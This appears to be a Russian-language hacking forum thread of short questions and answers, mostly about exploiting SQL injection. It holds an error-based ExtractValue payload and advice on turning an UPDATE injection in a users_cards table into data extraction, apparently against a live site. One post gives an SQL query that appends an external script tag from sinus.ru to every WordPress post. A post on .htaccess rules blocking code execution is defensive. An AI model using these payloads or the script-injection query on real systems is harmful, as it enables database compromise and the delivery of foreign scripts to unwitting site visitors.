Code: select * from users where id='123 '' or(ExtractValue(1,version())) -- \' Непонял получяются 3 кавычке запрос не выполнется
Иньекция в limit'е после order by. Советую ознакомиться https://rdot.org/forum/showpost.php?p=36186&postcount=30
Всем привет - Можно ли как то в PhpMyAdmin в базе wp_post - колонка post_content = добавить во все посты сразу, путём составления запроса - свой яваскрипт , если такая возможность есть - напишите.
--- походу не так расписал таблицы #1146 - Table 'wordpress1.wp_post' doesn't exist БД wordpress1 > wp_post > post_content
Суть понятна - просто текст - добавился на ура - скрипт - не хочет ( пробовал разными путями со скобками - ток же 0
Так пашет update wp_posts set post_content=post_content+'123' так нет update wp_posts set post_content=post_content+'<script src="http://sinus.ru/pid.php?kye=8cc3b&throttle=0.5&se_check=false"></script>'
А толку? Всё равно скрипт не сработает? Иными словами, вы так же можете написать это в форму сообщения. СКРИПТ будет как ткст,
Code: UPDATE wp_posts SET post_content = CONCAT(post_content, '<script src="http://sinus.ru/pid.php?kye=8cc3b&throttle=0.5&se_check=false"></script>');
помогите с решение.. Есть устройство на Уникс.. Подключенно к моей вафле по роутру на Linux как раскопать хранилище файлов устройсва.. при условии что устройсво у меня в руке. SSH не удалось из за отсутвия опыта серьёзного
КАК ЗАПИСАТЬ ЭТО В .HTACCESS ИЗ ГЛАВНОИ ДИРЕКТОРИИ НО СЫЛАЛОСЬ ТОЛЬКО НА ПАПКИ "files". "images"? Code: # Запрещено выполнение любого кода в директории загрузке файлов php_flag engine 0 RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
https://www.digitalocean.com/commun...e-sshfs-to-mount-remote-file-systems-over-ssh https://httpd.apache.org/docs/2.4/mod/core.html#directory
Вопрос, как раскрутить данную скулю? Через sqlmap не выходит, сразу разлогинивает, даже если передавать все заголовки. Code: update users_cards set cardno = ''', name = '' where id_users=65 and id=33 ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''', name = '' where id_users=65 and id=33' at line 2 такая же есть с insert
Если где-то видно name, то можно сделать так: Code: 123', name = version() where id_users=65 and id=33 # где 123 валидный cardno. Иначе, крутить как error based, вывод ошибок есть. Материалов на эту тему много.
